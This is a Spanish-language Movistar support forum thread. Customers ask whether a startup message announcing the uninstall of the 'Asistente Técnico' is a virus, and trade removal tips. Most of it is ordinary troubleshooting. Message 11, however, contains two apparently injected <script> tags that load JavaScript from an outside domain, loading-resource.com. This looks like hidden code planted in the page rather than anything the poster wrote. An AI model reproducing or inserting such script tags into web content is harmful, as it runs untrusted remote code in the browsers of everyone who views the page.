Problema con el Asistente Técnico - ¿Posible Virus?.

alexbatt
Yo probé el VDSL
Problema con el Asistente Técnico - ¿Posible Virus?.

Esta mañana al encender el ordenador, me ha salido un mensaje del Asistente Técnico Movistar diciéndome lo siguiente "Este software se encuentra obsoleto. Se va a proceder a su desinstalación". Con botón de Aceptar.

 

Queria saber si se trata de un virus (Ya no te puedes fiar de nadie) o es algo ormal que hace Movistar cada cierto tiempo. Tengo un Home Station desde Mayo.

 

Gracias. 

Mensaje 1 de 14
7.750 Visitas
13 RESPUESTAS 13
danimv
Más integrado que la RDSI

A mi me pasa exactamente lo mismo y no me atrevo a darle al botón aceptar

 

Mensaje 2 de 14
7.698 Visitas
alexbatt
Yo probé el VDSL

A ver si alguien nos ayuda.

Mensaje 3 de 14
7.662 Visitas
dadoal
Más integrado que la RDSI

yo le he dado, nada , se ha desistalado la version antigua que ponia telefonica para ahora tenerme que descargar la que pone movistar de la web.

es mas marketing que otra cosa.

analizado pc con eset nod32 y ni virus ni nada

Mensaje 4 de 14
7.661 Visitas
chemita3333
Yo probé el VDSL

Desde que puse movistar fusion, no puedo acceder a asistencia tecnica online chat ni hace una medicion de velocidad adsl con movistar. El error que me da es como si la linea desde la que me conecto no fuera de Movistar, ya que me pide que haga la conexion desde una linea adsl movistar. En efecto hoy al encender ordenador me ha dado el mismo mensaje, poniendose un icono en escritorio, de acceso directo a asistencia tecnica online. Pinchando en el icono me da el siguiente error, identico a los anteriores, que dice;

-------------------------------------------------------------------------------------------------------------------------------------------------------

Asistencia Técnica Online
Solicitud de asistencia
No es cliente de Movistar

No puede realizar una sesión de asistencia técnica por Chat.

 

El servicio de Atención Técnica Online se presta exclusivamente para clientes ADSL de Movistar que accedan desde su número ADSL.

-----------------------------------------------------------------------------------------------------------------------------------------------------------

A ver quien me puede solucionar este misterio, ya que ni en 1004 ni en 1002 ni en el telefono 900502010, he encontrado solucion. El misterio es, ¿como no reconoce movistar mi linea Movistar?. ¿Ni que accedo desde mi numero adsl?.

 

Gracias

 

 

Mensaje 5 de 14
7.647 Visitas
Sword
Más integrado que la RDSI

Yo tengo el mismo Problema.

Me instalaron el Asistente LAN+PC la semana pasada y ayer me salio el mismo mensaje diciendo que ese programa estaba obsoleto y que se iba a desinstalar. Le dí a "Aceptar" y me comenzó la desinstalacion pero al llegar casi al final me dió un error.

Ahora debe de estar medio desinstalado porque me desapareció el acceso directo del escritorio y sin embargo en la lista de programas instalados en el disco duro todavia aparece el "Asistente".

 

¿Qué sugiere el técnico de Movistar que haga? 

 

Gracias

 

Sword

 

 

 

 

Mensaje 6 de 14
7.453 Visitas
sniper
Yo probé el VDSL

te recomiendo desinstala el asistente no sirve para nada un saludo

Mensaje 7 de 14
7.164 Visitas
smiley 65
Yo probé el VDSL

Aunque desinstales manualmente el asistente (desde el panel de control) sigue saliendo el mensaje cada vez que arrancas.

Mensaje 8 de 14
6.727 Visitas
Quique-Movistar
Antiguo Moderador

Hola a todos

 

Nos comunican que podéis desinstalar el Asistente informático arrancando el Pc en "Modo a prueba de Fallos".

 

Otra opción que nos comunican es que podéis llamar al 1002 y se pondrán en contacto para resolver el problema de la desinstalación del Asistente.

 

Saludos.



Si necesitas soporte técnico en averías de Móvil, Fijo, Movistar+ o Internet Fijo (cobre o fibra), puedes acceder a nuestro apartado de Soporte Técnico o rellenar este formulario. También puedes contactar con nosotros llamando al 1002.

 Si necesitas contratar Fibra Ópticacomprobar tu cobertura Adsl y Fibrao ver información sobre la instalación de la fibra visita nuestra página ADSL y Fibra en movistar.es 

Solución aceptada.png
Mensaje 9 de 14
6.644 Visitas
CARMEN123
Más integrado que la RDSI

lo he desistalado ya cuatrop veces y me sigue apareciendo el mensaje, he llamado al servicio tecnico, cuartro veces y cada llamada ha sido de media hora y al final, te cuelgan y no te solucionan nada

 

Mensaje 10 de 14
6.517 Visitas
LONUMA
Más integrado que la RDSI

smiley 65 escribió:

Aunque desinstales manualmente el asistente (desde el panel de control) sigue saliendo el mensaje cada vez que arrancas.


Al inicial mi ordenador en casa, me sale el siguiente mensaje ("Este software se encuentra obsoleto. Se va a proceder a su desinstalación) hace referencia al asistente tecnico de movistar, lo he desinstalado desde el panel de control y sigue saliendome el mensajito, alquien  puede decirme lo que puedo hacer para evitar que siga saliendo este aviso.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script> <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>
Mensaje 11 de 14
5.932 Visitas
JuanMartin
Yo probé el VDSL

Restaurar a una fecha anterior seria lo ideal, pero eso sera casi imposible, pues este software se habra instalado hace ya tiempo en los ordenadores. Aun asi eso es una Mi..... te joroba el registro de Windows y todas las entradas de el. El arranque queda encustrado y aunque con "msconfig" se deshabilite, seguira el registro dañado. Intentar descargar Process Explorer de Microsoft y buscar el archivo de Asistente Tecnico y parar el proceso.  Despues cruzar los dedos.

 

Enlace de Process Explorer.  http://technet.microsoft.com/es-es/sysinternals/bb896653.aspx

MCC, Microsoft Partner.
Mensaje 12 de 14
5.882 Visitas
alexbatt
Yo probé el VDSL

Movistar como siempre, dando soluciones a sus clientes. Supongo que lo mejor es nio tocar nada y dejarlos como está,

Mensaje 13 de 14
5.128 Visitas
juanmaad
Más integrado que la RDSI

Yo resolví el problema asi:

_Cuando me salió por primera vez  esa ventana que se llama "AvisoDesint de Movistar"; dí a aceptar y me salió un mensaje de error, pero la ventana sigue.

_ Cda vez  que encendía el ordenador, me salía la ventana dichosa; desinstalé el programa en "Panel de control", al fin y al cabo lo tenemos en el CD que recibí con el modem.

_ Escribí el nombre "AvisoDesint de Movistar"; en "Buscar pogramas y archivos".

_Me dice que la ruta es: Archivos de Programas/Telefonica/agent/commom/snapins.

_Entro en snapins, me lo cargo, reinicio y por fin esa molesta ventana ya no aparece.

 

 

Mensaje 14 de 14
5.076 Visitas